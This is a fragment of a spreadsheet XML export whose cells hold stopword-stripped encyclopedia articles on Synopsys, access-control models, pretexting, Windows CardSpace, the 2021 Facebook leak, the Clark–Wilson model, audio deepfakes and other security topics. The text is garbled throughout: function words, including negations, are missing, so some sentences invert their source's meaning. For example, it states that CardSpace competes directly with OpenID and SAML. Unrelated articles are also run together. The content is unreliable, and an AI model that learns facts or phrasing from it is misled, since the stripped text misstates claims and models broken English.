(mathematical, argonaut, rotation i/o) chip later dubbed super went sell millions, time outselling risc core.following success super designers split main company subsidiary called multi media technologies (mmt). they created 32-bit design would later called marketed first general-purpose configurable microprocessor. later, acquired argonaut software eventually turned company called argonaut technologies (atl) spun separate company eventually became international. 1995 terwilliger took arc's first ceo. created company licensing strategy, commercialized product, including acquisition metaware, vautomation, precise software. raised million pre-ipo took company public september 2000, raising additional $250 million. black duck software black duck software privately held company focused automating process identifying creating inventory open source code used software applications, well detecting known security vulnerabilities license compliance issues. black duck acquired synopsys december 2017. whitehat security april 2022, synopsys announced acquisition whitehat security $330 million. whitehat security founded 2001 provides application security well insights devops teams. divisions synopsys three divisions, including silicon design verification, silicon intellectual property, software integrity. silicon design verification this synopsys division focuses design verification integrated circuits designing advanced processes models manufacturing chips. silicon intellectual property this division synopsys focuses silicon intellectual property system-on-a-chip (soc) designs. software integrity 2014, synopsys began expand products services include software security quality. this division helps organizations integrate security devops environments, build holistic application security programs, test software on-demand, find software quality compliance issues earlier, identify manage open-source software components, assess application security threats, risks dependencies. partnerships 2018, synopsys partnered people's liberation army national defence university provide field-programmable gate array design training. also list companies list tools static code analysis proprietary software security information event management dynamic application security testing owasp references external links official website business data synopsys, inc.:</t>
  </si>
  <si>
    <t>Attitudinal analytics</t>
  </si>
  <si>
    <t>attitudinal analytics marketing technology application involves integration online surveys capture visitor intent critical demographic attributes tracking explicit behavior click stream monitoring websites. this quantitative user experience collects data thousands user sessions rather hundreds. this data typically compared performance indicators performance, customer satisfaction overall customer experience success failure. reports finding recommendations used improve website customer experience program heavily dependent upon online campaigns driving traffic website collection sites. offline measurement also incorporated extend customer experience understanding illuminate elements online experience impacted offline behavior purchasing store visiting branch office.several vendors provide attitudinal analytics solutions stand-alone offerings. leading analytics players also providing partner integration frameworks better integrate silos intent, attitudinal behavioral data. references case study https://web.archive.org/web/20080311081258/http://www.usabilitysciences.com/category/case-studies/</t>
  </si>
  <si>
    <t>QNu Labs</t>
  </si>
  <si>
    <t>labs qunu labs private limited) cybersecurity company headquartered bengaluru, india. credited first firm india successfully develop commercial cybersecurity products using quantum physics. subsidiary called labs inc, massachusetts, 2019.the company founded 2016 sunil gupta, srinivasa aluri, mark mathias, anil prabhakar. incubated indian institute technology-madras later began operations bengaluru. after conducting field trials quantum distribution (qkd) product, labs received support cisco launchpad 2018. subsequently, launched products—a quantum distributor (qkd) called armos quantum random number generator (qrng) called tropos—for national international markets 2020. references external links company website drdo tests quantum distribution tech secure communication facilities budget 2020 announces 8,000 crore national mission quantum technologies applications india’s billion-dollar quantum push race</t>
  </si>
  <si>
    <t>Attribute-based access control</t>
  </si>
  <si>
    <t>attribute-based access control (abac), also known policy-based access control iam, defines access control paradigm whereby subject's authorization perform operations determined evaluating attributes associated subject, object, requested operations, and, cases, environment attributes.abac policy rules generated boolean functions subject's attributes, object's attributes, environment attributes.unlike role-based access control (rbac), defines roles carry specific privileges associated subjects assigned, abac express complex rule sets evaluate many different attributes. attribute values set-valued atomic-valued. set-valued attributes contain atomic value. examples role project. atomic-valued attributes contain atomic value. examples clearance sensitivity. attributes compared static values another, thus enabling relation-based access control. although concept existed many years, abac considered "next generation" authorization model provides dynamic, context-aware risk-intelligent access control resources allowing access control policies include specific attributes many different information systems defined resolve authorization achieve efficient regulatory compliance, allowing enterprises flexibility implementations based existing infrastructures. attribute-based access control sometimes referred policy-based access control (pbac) claims-based access control (cbac), microsoft-specific term. standards implement abac xacml alfa (xacml). dimensions attribute-based access control abac seen externalized authorization management dynamic authorization management policy-based access control fine-grained authorization components architecture abac comes recommended architecture follows: policy enforcement point: responsible protecting apps data want apply abac inspects request generates authorization request sends pdp. policy decision point brain architecture. this piece evaluates incoming requests policies configured with. returns permit/ deny decision. also pips retrieve missing metadata policy information point bridges external sources attributes e.g. ldap databases. attributes attributes anything anyone. they tend fall different categories: subject attributes: attributes describe user attempting access e.g. age, clearance, department, role, title action attributes: attributes describe action attempted e.g. read, delete, view, approve object attributes: attributes describe object resource) accessed e.g. object type (medical record, bank account), department, classification sensitivity, location contextual (environment) attributes: attributes deal time, location dynamic aspects access control scenario policies policies statements bring together attributes express happen allowed. policies abac granting denying policies. policies also local global written override policies. examples include: user view document document department user user edit document owner document draft mode deny access amwith abac many policies like cater many different scenarios technologies. other models historically, access control models included mandatory access control (mac), discretionary access control (dac), recently role-based access control (rbac). these access control models user-centric take account additional parameters resource information, relationship user (the requesting entity) resource, dynamic information, e.g. time user abac tries address defining access control based attributes describe requesting entity (the user), targeted object resource, desired action (view, edit, delete), environmental contextual information. this access control said attribute-based. implementations standard implements attribute- policy-based access control xacml, extensible access control markup language. xacml defines architecture, policy language, request/ response scheme. handle attribute management (user attribute assignment, object attribute assignment, environment attribute assignment) left traditional tools, databases, directories. companies, including every branch united states military, started using abac. basic level, abac protects data ‘if/then/and’ rules rather assign data users. department commerce made mandatory practice adoption spreading throughout several governmental military agencies. applications concept abac applied level technology stack enterprise infrastructure. example, abac used firewall, server, application, database, data layer. attributes bring additional context evaluate legitimacy request access inform decision grant deny access. important consideration evaluating abac solutions understand potential overhead performance impact user experience. expected granular controls, higher overhead. microservices security abac used apply attribute-based, fine-grained authorization methods functions. instance, banking expose approvetransaction(transid) method. abac used secure call. with abac, policy author write following: policy: managers approve transactions approval limit attributes used: role, action object type, amount, approval limit.the flow would follows: user, alice, calls method approvetransaction(123) receives call authenticates user. interceptor calls authorization engine (typically called policy decision point pdp) asks: alice approve transaction 123? retrieves abac policy necessary attributes. reaches decision e.g. permit deny returns interceptor decision permit, underlying business logic called. otherwise returns error access denied. application security benefits abac authorization policies attributes defined technology neutral way. this means policies defined apis databases reused application space. common applications benefit abac are: content management systems erps home-grown applications applicationsthe process flow described section applies too. database security security databases long specific database vendors: oracle vpd, fgac, microsoft means achieve fine-grained abac-like security. example would policy: managers view transactions region reworked policy data-centric way: users role manager action select table transactions user.region transaction.region data security data security typically goes step database security applies control directly data element. this often referred data-centric security. traditional relational databases, abac policies control access data table, column, field, cell sub-cell using logical controls filtering conditions masking based attributes. attributes data, user, session tools based deliver greatest level flexibility dynamically granting/denying access specific data element. data, distributed file systems hadoop, abac applied data layer control access folder, sub-folder, file, sub-file granular. data security attribute-based access control also applied data systems like hadoop. policies similar used previously applied retrieving data data lakes. file server security windows server 2012, microsoft implemented abac approach controlling access files folders. this achieved dynamic access control (dac) security descriptor definition language (sddl). sddl seen abac language uses metadata user (claims) file/ folder control access. also references external links role-based access control attribute-based access control explained attribute based access control (abac) overview unified attribute based access control model (abac) covering dac, rbac attribute based access control models (abac) implementation cloud infrastructure service abac rbac: welcome (iot) world contextual security, 2015, lori macvittie market compass: dynamic authorization management, 2020, graham williamson</t>
  </si>
  <si>
    <t>2020 cyberattacks on Sri Lanka</t>
  </si>
  <si>
    <t>2020 cyberattacks lanka series cyberattacks least lankan national websites top-level domains .gov .com. cyberattack speculated conducted 2020. cyber-attack also launched leading news website lanka. website chinese embassy operating lanka website cabinet office lanka also affected cyberattack. investigations currently carried lanka computer emergency readiness team along information technology society lanka (itssl). itssl believes cyber attack conducted group called 'tamil eelam cyber force'. references</t>
  </si>
  <si>
    <t>Pretexting</t>
  </si>
  <si>
    <t>pretexting type social engineering attack involves situation, pretext, created attacker order lure victim vulnerable situation trick giving private information, specifically information victim would typically give outside context pretext. history, pretexting described first stage social engineering, used investigations. specific example pretexting reverse social engineering, attacker tricks victim contacting attacker first. reason pretexting's prevalence among social engineering attacks reliance manipulating human mind order gain access information attacker wants, versus hack technological system. when looking victims, attackers watch variety characteristics, ability trust, perception threat, response authority, susceptibility react fear excitement different situations. throughout history, pretexting attacks increased complexity, evolved manipulating operators phone 1900s hewlett packard scandal 2000s, involved social security numbers, phones, banks. current education frameworks social engineering used organizations, although researchers academia suggested possible improvements frameworks. background social engineering social engineering psychological manipulation tactic leads unwilling unknowing response target/victim. information security threats modern world, affecting organizations, business management, industries. social engineering attacks considered difficult prevent root psychological manipulation. these attacks also reach broader scale. security attacks, company holds customer data might breached. with social engineering attacks, company (specifically workers within company) customer directly susceptible targeted.an example would banking industry, bank employees attacked, customers well. social engineering culprits directly target customers and/or employees work around trying hack purely technological system exploit human vulnerabilities.though definition relation cybersecurity skewed across different literature, common theme social engineering cybersecurity) exploits human vulnerabilities order breach entities computers information technology.social engineering little literature research done currently. however, main part methodology researching social engineering made-up pretext. when assessing social engineering attacks dangerous harmful, (ie. phishing, vishing, water-holing), type pretext largely insignificant factor, seeing attacks multiple pretexts. thus, pretexting widely used, attack, component others. pretexting timeline social engineering cybersecurity, pretexting considered earliest stages evolution social engineering. example, social engineering attack known phishing relies modern items credit cards mainly occurs electronic space, pretexting implemented without technology.pretexting first examples social engineering. coined 1974, concept pretexting often used help investigations. phase, pretexting consisted attacker calling victim simply asking information. pretexting attacks usually consist persuasion tactics. after beginning phase social engineering's evolution (1974-1983), pretexting changed persuasion tactics, deception tactics well. technology developed, pretexting methods developed alongside soon, hackers access wider audience victims invention social media. reverse social engineering reverse social engineering specific example pretexting. non-electronic form social engineering attacker creates pretext user manipulated contacting attacker first, versus around. typically, reverse engineering attacks involve attacker advertising services type technical aid, establishing credibility. then, victim tricked contacting attacker seeing advertisements, without attacker directly contacting victim first place. once attacker successfully accomplishes reverse social engineering attack, wide range social engineering attacks established falsified trust attacker victim (for example, attacker give victim harmful link solution victim's problem. connection attacker victim, victim inclined believe attacker click harmful link). social aspect pretexting continues seen useful tactic social engineering attacks. according researchers, rely technology (such hacking computer systems breaching technology). pretexting occur online, reliant user aspects personality attacker utilize advantage. attacks reliant user harder track control, person responds social engineering pretexting attacks differently. directly attacking computer, however, take less effort solve, since computers relatively work similar ways. there certain characteristics users attackers pinpoint target. academia, common characteristics are: prized victim "prized", means he/she type information social engineer desires. ability trust trustworthiness goes along likability, typically someone liked, trusted. similarly, trust established social engineer (the attacker) victim, credibility also established. thus, easier victim divulge personal information attacker victim easily able trust. susceptibility react easily person reacts events degree used social engineer's favor. particularly, emotions like excitement fear often used persuade people divulge information. example, pretext could established wherein social engineer teases exciting prize victim agree give social engineer banking information. feeling excitement used lure victim pretext persuade give attacker information sought after. perception threat despite understanding threats exist anything online, people perform actions this, clicking random links accepting unknown friend requests. this person perceiving action threat negative consequence. this lack fear/threat, despite awareness presence, another reason social engineering attacks, especially pretexting, prevalent. response authority victim submissive compliant, attacker likely successful attack pretext victim thinks attacker posed type authoritative figure. examples early pretexting (1970–80s) october 1984 article switching centres operators detailed common pretexting attack time. attackers would often contact operators specifically operated deaf people using teletypewriters. logic operators often patient regular operators, easier manipulate persuade information attacker desired. recent examples notable hewlett packard scandal. company hewlett packard wanted know leaking information journalists. order provided private investigators employees' personal information (such social security numbers), private investigators turn called phone companies impersonating employees hopes obtaining call records. when scandal discovered, resigned.in general, socialbots machine-operated fake social media profiles employed social engineering attackers. social media sites like facebook, socialbots used send mass friend requests order find many potential victims possible. using reverse social engineering techniques, attackers socialbots gain massive amounts private information many social media users. current education frameworks current education frameworks topic social engineering fall categories: awareness training. awareness information social engineering presented intended party inform topic. training specifically teaching necessary skills people learn case social engineering attack encounter one. awareness training combined intensive process constructing education frameworks. while research done successfulness necessity training programs context cybersecurity education, information lost comes social engineering training. research study social engineering education banks across asian pacific, found frameworks touched upon either awareness training. also, type social engineering attack taught phishing. looking comparing security policies banks' websites, policies contain generalized language "malware" "scams", also missing details behind different types social engineering attacks examples types.this generalization benefit users educated frameworks, considerable depth missing user educated broad terms like examples above. well, purely technical methods combatting social engineering pretexting attacks, firewalls antiviruses, ineffective. this social engineering attacks typically involve exploiting social characteristic human nature, thus purely combatting technology ineffective. also social engineering pretext phishing hewlett-packard spying scandal references</t>
  </si>
  <si>
    <t>Windows CardSpace</t>
  </si>
  <si>
    <t>windows cardspace (codenamed infocard) discontinued identity selector microsoft. stores references digital identities users, presenting visual information cards. cardspace provides consistent designed help people easily securely identities applications sites accepted. resistance phishing attacks adherence cameron's laws identity" goals design.cardspace built-in component windows made available windows windows server 2003, windows vista part .net framework package. overview when information card-enabled application website wishes obtain information user, requests particular claims. cardspace appears, switching display cardspace service, displays user's stored identities visual cards. user selects card use, cardspace software contacts issuer identity obtain digitally signed token contains requested information. cardspace also allows users create personal (also known self-issued) information cards, contain fields identity information full name address. other transactions require managed information card; issued third-party identity provider makes claims person's behalf, bank, employer, government agency. windows cardspace built services protocol stack, open xml-based protocols, including ws-security, ws-trust, ws-metadataexchange ws-securitypolicy. this means technology platform supports protocols integrate cardspace. accept information cards, developer needs declare html &lt;object&gt; specifies claims website demanding implement code decrypt returned token extract claim values. identity provider wants issue tokens, must provide means user obtain managed card provide security token service (sts) handles ws-trust requests returns appropriate encrypted signed token. during 2000s, identity providers wish build could obtain variety vendors, including pingidentity, bmc, microsystems, microsoft, siemens. because cardspace identity metasystem upon based token-format-agnostic, cardspace compete directly internet identity architectures like openid saml. these three approaches identity seen complementary, 2000s, information cards could used today signing openid providers, windows live accounts, saml identity providers. novell planned support higgins trust framework provide development framework includes support information cards services protocol stack, thus including cardspace within broader, extensible framework also supporting identity-related technologies, saml openid. release microsoft initially shipped windows cardspace .net framework 3.0, runs windows windows server 2003, windows vista. installed default windows vista well windows available free download server 2003 windows update. updated version cardspace shipped .net framework 3.5. credential manager windows uses windows cardspace management storage saved user credentials. discontinuation february 2011, microsoft announced windows cardspace would shipped. microsoft later worked replacement called u-prove. also information card higgins project shibboleth (internet2) identity management systems windows hello references further reading external links software developmentwindows cardspace .net framework documentation site developer articles technical documentation windows cardspace microsoft information card asp.net asp.net relying party (rp) code support cardspace microsoft information card html platform-independent javascript code detects client i-cards provides corresponding support open source ruby code accepting information cards open source java code accepting information cards open source code accepting cards open source code accepting information cards code managed i-cards open source security token service code managed cards open source code managed information cardsidentity selectorsdigital open-source identity selector linux plug-in apple's safari implementing information card identity selector plug-in firefox activate cardspace identity selectorsblogskim cameron's identity weblog blog microsoft's architect identity mike jones: self-issued blog cardspace, cards, digital identity microsoft's director identity partnerships vittorio bertocci (archived) blog designing developing cardspace microsoft's architect evangelist windows server 2008 claim-based identity blog (archived) blog cardspace development team</t>
  </si>
  <si>
    <t>2021 Facebook leak</t>
  </si>
  <si>
    <t>2021, internal document leak company known facebook (now meta platforms, meta) showed aware harmful societal effects platforms. leak, released whistleblower frances haugen, resulted reporting wall street journal september, facebook files series, well facebook papers, consortium news outlets next month. primarily, reports proved based internally commissioned studies, company fully aware negative impact teenage users instagram, contribution facebook activity violence developing countries. other takeaways leak include impact company's platforms spreading false information promoting anger-provoking posts. furthermore, harmful content known pushed facebook algorithms reaching young users. type content included anorexia posts self harm photos. background september 2021, wall street journal began publishing articles facebook based internal documents unknown provenance. revelations included reporting special allowances posts high-profile users ("xcheck"), subdued responses flagged information human traffickers drug cartels, shareholder lawsuit concerning cost facebook (now meta) mark zuckerberg's personal liability protection resolving cambridge analytica data scandal, initiative increase pro-facebook news within user news feeds, internal knowledge instagram exacerbated negative self-image surveyed teenage girls.siva vaidhyanathan writes guardian documents team facebook "devoted social science data analytics supposed help company's leaders understand consequences policies technological designs." casey newton verge wrote company's biggest challenge since cambridge analytica data scandal.the leaked documents include internal research facebook studied impact instagram teenage mental health. although facebook earlier claimed rules applies equally everyone platform, internal documents shared wall street journal point special policy exceptions reserved users, including celebrities politicians. after reporting, facebook's oversight board said would review system.the former facebook employee behind leak, frances haugen, revealed identity minutes october 2021. reports beginning october group news outlets began publishing articles based documents provided haugen's lawyers, collectively referred facebook papers. instagram's effects teenagers files show facebook (now meta) conducting internal research instagram affects young users past three years. while findings point instagram harmful large portion young users, teenage girls among harmed. researchers within company reported make body issues worse three teenage girls". furthermore, internal research revealed teen boys also affected negative social comparison, citing boys 2019. instagram concluded contribute problems specific use, social comparison among teens. facebook published internal research september 2021, saying reports mischaracterized purpose results research. studying preteens files show facebook formed team study preteens, three year goal create products demographic, commissioned strategy papers long-term business prospects attracting preteen demographic. 2020 document facebook states: "why care tweens?" answers question saying "they valuable untapped audience." violence developing countries internal memo seen washington post revealed facebook aware hate speech calls violence groups like muslims kashmiris, including posts photos piles dead kashmiri bodies glorifying captions platform india. still, none publishers blocked. documents reveal facebook responded incidents removing posts violate policy, made substantial efforts prevent repeat offenses. monthly facebook users located outside canada, facebook claims language barriers obstacle preventing widespread reform. controlling falsehoods 2020 u.s. elections york times pointed internal discussions employees raised concerns facebook spreading content qanon conspiracy theory year 2020 united states elections. after election, data scientist mentioned internal note percent u.s. views political content posts alleging election fraudulent. promoting anger-provoking posts 2015, addition like button posts, facebook introduced emotional reaction options: love, haha, yay, wow, angry. washington post reported three years, facebook's algorithms promoted posts received 'angry' reaction users, based internal analysis showing posts lead five times engagement posts regular likes. years later, facebook's researchers pointed posts 'angry' reactions much likely toxic, polarizing, fake quality.in 2018, facebook overhauled news feed algorithm, implementing algorithm favored "meaningful social interations" "msi". algorithm increased weight reshared material move aimed "reverse decline comments encourage original posting". while algorithm successful efforts, consequences user reports feed quality decreasing along increased anger site observed. leaked documents reveal employees presented several potential changes highlighted issues algorithm. however, documents claim mark zuckerberg denied proposed changes worry might cause less users engage facebook. documents also pointed another 2019 study conducted facebook fake account based india created studied type content presented interacted with. results study showed within three weeks, fake account's newsfeed presented pornography "filled polarizing graphic content, hate speech misinformation", according internal company report. employee dissatisfaction politico quotes several facebook staff expressing concerns company's willingness ability respond damage caused platform. 2020 post reads: "it's normal large number people 'make site safe' team leave saying, 'hey, we're actively making world worse fyi.' every time gets raised gets shrugged 'hey people change jobs time' normal." apple's threat remove facebook instagram 2019, following concerns facebook instagram used trade maids middle east, apple threatened remove apps store. xcheck documents shown private program known "xcheck" "cross-check" facebook employed order whitelist posts users deemed "high-profile". system began quality control measure since grown protect "millions users company's normal enforcement process". xcheck celebrities public figures exempt punishment average facebook user would receive violating policies. 2019, football player neymar posted nude photos woman accused rape left day. according wall street journal, "xcheck grew include least million users 2020" according facebook's internal documents. goal xcheck never publicly tangle anyone influential enough harm". collaboration censorship government vietnam 2020, vietnam's communist government threatened shut facebook social media company co-operate censoring political content country, meta's (then known facebook) biggest market region. decision comply personally approved mark zuckerberg. suppression political movements platform 2021, facebook developed strategy addressing harmful content site, implementing measures designed reduce suppress spread movements deemed hateful. according senior security official facebook, company "would seek disrupt on-platform movements compelling evidence product tightly knit circles users connected real-world violence harm committed violating facebook's rules". part recently coordinated initiative, included less promotion movement's posts within users' news feed well notifying users posts pages. specific groups highlighted affected facebook's social harm policy include patriot party, previously linked capitol attack, well newer german conspiracy group known querdenken, placed surveillance german intelligence protests organized repeatedly "resulted violence injuries police". facebook's concern according wall street journal, documents show 2019, facebook reduced time spent human reviewers hate-speech complaints, shifting towards stronger dependence artificial intelligence systems regulate matter. however, internal documents employees claim largely unsuccessful, seeing trouble detecting videos cars crashing, cockfighting, well understanding hate speech foreign languages. internal engineers researchers within facebook estimated able detect remove 0.6% "all content violated facebook's policies violence incitement". wall street journal podcast facebook files series reports, wall street journal produced podcast journal channel, divided eight episodes: part whitelist part make body image issues worse' part 'this shouldn't happen facebook' part outrage algorithm part push attract younger users part whistleblower part challenge part enforcement strategy facebook's response 2021 earnings call, facebook mark zuckerberg discussed recent leaks, characterizing coordinated efforts paint false picture company selectively leaking documents.according leaked internal email seen york times, facebook asked employees "preserve internal documents communications since 2016", practice called legal hold. email continues: often case following kind reporting, number inquiries governments legislative bodies launched company's operations." lobbying december 2021, news broke wall street journal pointing meta's lobbying efforts divide lawmakers "muddy waters" congress, hinder regulation following 2021 whistleblower leaks. facebook's lobbyist team washington suggested republican lawmakers whistleblower "was trying help democrats," narrative told democratic staffers republicans "were focused company's decision expressions support kyle rittenhouse," wall street journal reported. according article, company's goal "muddy waters, divide lawmakers along partisan lines forestall cross-party alliance" facebook (now meta) congress. also criticism facebook comparison user features messaging platforms instagram's impact people problematic social media references further reading external links official website (the facebook files, wall street journal)</t>
  </si>
  <si>
    <t>Clark–Wilson model</t>
  </si>
  <si>
    <t>clark–wilson integrity model provides foundation specifying analyzing integrity policy computing system. model primarily concerned formalizing notion information integrity. information integrity maintained preventing corruption data items system either error malicious intent. integrity policy describes data items system kept valid state system next specifies capabilities various principals system. model uses security labels grant access objects transformation procedures restricted interface model. origin model described 1987 paper comparison commercial military computer security policies) david clark david wilson. paper develops model formalize notion information integrity, especially compared requirements multilevel security (mls) systems described orange book. clark wilson argue existing integrity models biba (read-up/write-down) better suited enforcing data integrity rather information confidentiality. biba models clearly useful example, banking classification systems prevent untrusted modification information tainting information higher classification levels. contrast, clark–wilson clearly applicable business industry processes integrity information content paramount level classification (although authors stress three models obviously government industry organizations). basic principles according stewart chapple's cissp study guide sixth edition, clark–wilson model uses multi-faceted approach order enforce data integrity. instead defining formal state machine, model defines data item allows modifications small programs. model uses three-part relationship subject/program/object (where program interchangeable transaction) known triple access control triple. within relationship, subjects direct access objects. objects accessed programs. look differs access control models. model's enforcement certification rules define data items processes provide basis integrity policy. core model based notion transaction. well-formed transaction series operations transition system consistent state another consistent state. model integrity policy addresses integrity transactions. principle separation duty requires certifier transaction implementer different entities.the model contains number basic constructs represent data items processes operate data items. data type clark–wilson model constrained data item (cdi). integrity verification procedure (ivp) ensures cdis system valid certain state. transactions enforce integrity policy represented transformation procedures (tps). takes input unconstrained data item (udi) produces cdi. must transition system valid state another valid state. udis represent system input (such provided user adversary). must guarantee (via certification) transforms possible values “safe” cdi. rules heart model notion relationship authenticated principal (i.e., user) programs (i.e., tps) operate data items (e.g., udis cdis). components relation, taken together, referred clark–wilson triple. model must also ensure different entities responsible manipulating relationships principals, transactions, data items. short example, user capable certifying creating relation able execute programs specified relation. model consists sets rules: certification rules enforcement rules (e). nine rules ensure external internal integrity data items. paraphrase these: c1—when executed, must ensure cdis valid.c2—for associated cdis, must transform cdis valid state another.since must make sure certified operate particular cdi, must e1—system must maintain list certified relations ensure certified change cdi.e2—system must associate user cdis. access behalf user "legal".e3-the system must authenticate identity user attempting execute tp.this requires keeping track triples (user, {cdis}) called "allowed relations". c3—allowed relations must meet requirements "separation duty".we need authentication keep track this. c4—all must append enough information reconstruct operation.when information enters system need trusted constrained (i.e. udi). must deal appropriately. c5—any takes input perform valid transactions possible values udi. either accept (convert cdi) reject udi.finally, prevent people gaining access changing qualifications e4—only certifier change list entities associated cw-lite variant clark-wilson cw-lite model, relaxes original requirement formal verification semantics. semantic verification deferred separate model general formal proof tools. also confused deputy problem references clark, david wilson, david comparison commercial military computer security policies; proceedings 1987 ieee symposium research security privacy (sp'87), 1987, oakland, ieee press, 184–193 chapple, mike; stewart, james gibson darril certified information systems security professional; official study guide (8th edition) 2018, john wiley sons, indiana shankar, umesh; jaeger, trent; sailer, reiner "toward automated information-flow integrity verification security-critical applications"; "proceedings 2006 network distributed systems security symposium (ndss '06), february 2006, diego, ca“; internet society, 267-280 external links slides clark–wilson used professor matt bishop teach computer security http://doi.ieeecomputersociety.org/10.1109/sp.1987.10001</t>
  </si>
  <si>
    <t>Audio deepfake</t>
  </si>
  <si>
    <t>audio deepfake type artificial intelligence used create convincing speech sentences sound like specific people saying things say. this technology initially developed various applications improve human life. example, used produce audiobooks, also help people lost voices (due throat disease medical problems) back. commercially, opened door several opportunities. this technology also create personalized digital assistants natural-sounding speech translation services. audio deepfakes, recently called audio manipulations, becoming widely accessible using simple mobile devices personal pcs. unfortunately, tools also used spread misinformation around world using audio, malicious fears audio deepfake. this cybersecurity concerns among global public side effects using audio deepfakes. people logical access voice spoofing technique, used manipulate public opinion propaganda, defamation, terrorism. vast amounts voice recordings daily transmitted internet, spoofing detection challenging. however, audio deepfake attackers targeted individuals organizations also politicians governments. early 2020, scammers used artificial intelligence-based software impersonate voice authorize money transfer million phone call. therefore, necessary authenticate audio recording distributed avoid spreading misinformation. categories audio deepfakes divided three different categories: replay-based replay-based deepfakes malicious works reproduce recording interlocutor's voice.there types: far-field detection cut-and-paste detection. far-field detection, microphone recording victim played test segment hands-free phone. hand, cut-and-paste involves faking requested sentence text-dependent system. text-dependent speaker verification used defend replay-based attacks. current technique detects end-to-end replay attacks deep convolutional neural networks. synthetic-based category based speech synthesis refers artificial production human speech, using software hardware system programs. speech synthesis includes text-to-speech, aims transform text acceptable natural speech real-time, making speech sound line text input, using rules linguistic description text. classical system type consists three modules: text analysis model, acoustic model, vocoder. generation usually follow essential steps. necessary collect clean well-structured audio transcripted text original speech audio sentence. second, text-to-speech model must trained using data build synthetic audio generation model. specifically, transcribed text target speaker's voice input generation model. text analysis module processes input text converts linguistic features. then, acoustic module extracts parameters target speaker audio data based linguistic features generated text analysis module. finally, vocoder learns create vocal waveforms based parameters acoustic features. final audio file generated, including synthetic simulation audio waveform format, creating speech audio voice many speakers, even training. first breakthrough regard introduced wavenet, neural network generating audio waveforms capable emulating characteristics many different speakers. this network overtaken years systems synthesize highly realistic artificial voices within everyone’s reach.unfortunately, text-to-speech highly dependent quality voice corpus used realize system, creating entire voice corpus expensive. another disadvantage speech synthesis systems recognize periods special characters. also, ambiguity problems persistent, words written different meanings. imitation-based audio deepfake based imitation transforming original speech speaker original sounds spoken like another speaker target one. imitation-based algorithm takes spoken signal input alters changing style, intonation, prosody, trying mimic target voice without changing linguistic information. this technique also known voice conversion. this method often confused previous synthetic-based method, clear separation approaches regarding generation process. indeed, methods modify acoustic-spectral style characteristics speech audio signal, imitation-based usually keeps input output text unaltered. this obtained changing sentence spoken match target speaker's characteristics.voices imitated several ways, using humans similar voices mimic original speaker. recent years, popular approach involves particular neural networks called generative adversarial networks (gan) flexibility well high-quality results.then, original audio signal transformed speech target audio using imitation generation method generates speech, shown fake one. detection methods audio deepfake detection task determines whether given speech audio real fake. recently, become topic forensic research community, trying keep rapid evolution counterfeiting techniques. general, deepfake detection methods divided categories based aspect leverage perform detection task. first focuses low-level aspects, looking artifacts introduced generators sample level. second, instead, focus higher-level features representing complex aspects semantic content speech audio recording. many machine learning deep learning models developed using different strategies detect fake audio. most time, algorithms follow three-steps procedure: each speech audio recording must preprocessed transformed appropriate audio features; computed features detection model, performs necessary operations, training process, essential discriminate real fake speech audio; output final module produce prediction probability fake class real one. following asvspoof challenge nomenclature, fake audio indicated term "spoof," real instead called "bonafide."over years, many researchers shown machine learning approaches accurate deep learning methods, regardless features used. however, scalability machine learning methods confirmed excessive training manual feature extraction, especially many audio files. instead, deep learning algorithms used, specific transformations required audio files ensure algorithms handle them. there several open-source implementations different detection methods, usually many research groups release public hosting service like github. open challenges future research direction audio deepfake recent field research. reason, many possibilities development improvement, well possible threats adopting technology bring daily lives. important ones listed below. deepfake generation regarding generation, significant aspect credibility victim, i.e., perceptual quality audio deepfake. several metrics determine level accuracy audio deepfake generation, widely used (mean opinion score), arithmetic average user ratings. usually, test rated involves perceptual evaluation sentences made different speech generation algorithms. this index showed audio generated algorithms trained single speaker higher mos.the sampling rate also plays essential role detecting generating audio deepfakes. currently, available datasets sampling rate around khz, significantly reducing speech quality. increase sampling rate could lead higher quality generation. deepfake detection focusing detection part, principal weakness affecting recent models adopted language. most studies focus detecting audio deepfake english language, paying much attention spoken languages like chinese spanish, well hindi arabic. also essential consider factors related different accents represent pronunciation strictly associated particular individual, location, nation. fields audio, speaker recognition, accent found influence performance significantly, expected feature could affect models' performance even detection task. addition, excessive preprocessing audio data high often unsustainable computational cost. reason, many researchers suggested following self-supervised learning approach, dealing unlabeled data work effectively detection tasks improving model's scalability, and, time, decreasing computational cost. training testing models real audio data still underdeveloped area. indeed, using audio real-world background noises increase robustness fake audio detection models. addition, effort focused detecting synthetic-based audio deepfakes, studies analyzing imitation-based intrinsic difficulty generation process. defense deepfakes over years, increase techniques aimed defending malicious actions audio deepfake could bring, identity theft manipulation speeches nation's governors. prevent deepfakes, suggest using blockchain distributed ledger technologies (dlt) identify provenance data track information.extracting comparing affective cues corresponding perceived emotions digital content also proposed combat deepfakes.another critical aspect concerns mitigation problem. would better keep proprietary detection tools need them, fact-checkers journalists. that way, create generation models, perhaps nefarious purposes, would know precisely features facilitate detection deepfake, discouraging possible attackers. improve detection instead, researchers trying generalize process, looking preprocessing techniques improve performance testing different loss functions used training. research programs numerous research groups worldwide working recognize media manipulations, i.e., audio deepfakes also image video deepfake. these projects usually supported public private funding close contact universities research institutions. purpose, defense advanced research projects agency (darpa) runs semantic forensics (semafor). leveraging research media forensics (medifor) program, also darpa, semantic detection algorithms determine whether media object generated manipulated, automate analysis media provenance uncover intent behind falsification various content.another research program preserving media trustworthiness artificial intelligence (premier) program, funded italian ministry education, university research (miur) five italian universities. premier pursue novel hybrid approaches obtain forensic detectors interpretable secure. public challenges last years, numerous challenges organized push field audio deepfake research even further. famous world challenge asvspoof, automatic speaker verification spoofing countermeasures challenge. this challenge bi-annual community-led initiative aims promote consideration spoofing development countermeasures.another recent challenge audio deepfake detection considers fake situations real-life scenario.also voice conversion challenge bi-annual challenge, created need compare different voice conversion systems approaches using voice data. also references</t>
  </si>
  <si>
    <t>Peephole</t>
  </si>
  <si>
    <t>peephole, peekhole, spyhole, doorhole, magic eye, magic mirror door viewer, small, round opening door viewer inside dwelling "peek" directly outside door. lenses made arranged viewing possible direction. opening typically larger diameter dime. door, usually apartments hotel rooms, peephole enables outside without opening door. glass peepholes often fitted fisheye lens allow wider field view inside. preventing inside viewability simple peepholes allow people outside inside. fisheye lens offers little visibility outside, defeated using peephole reverser. some peepholes shutter falls hole nobody inside holding digital peepholes camera outside screen inside, without information going inside outside. another design prevent people outside seeing involves outside-facing lens projecting image onto semi-opaque frosted ground glass screen. inside viewer side door arm's length away, rather peering small hole, frosted glass finish makes impossible someone look outside. there drawbacks projection method: area viewed must well lit, installation requires much larger hole door traditional peephole. references</t>
  </si>
  <si>
    <t>Peer-to-peer</t>
  </si>
  <si>
